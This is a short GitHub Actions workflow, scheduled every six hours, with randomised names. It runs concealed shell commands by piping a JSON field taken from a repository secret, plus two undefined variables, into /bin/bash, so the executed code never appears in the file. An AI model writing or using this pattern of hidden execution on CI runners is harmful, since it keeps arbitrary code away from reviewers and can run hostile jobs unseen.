name: colossalfrittata

on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: colossalfrittata
        env:
          k0585: ${{ secrets.k0585 }}
        run: |
          echo $k0585 | jq -r .kwkm4108 | /bin/bash
          echo $bgtm4399 | jq -r .c9 | /bin/bash
          echo $m09 | jq -r .zi1 | /bin/bash

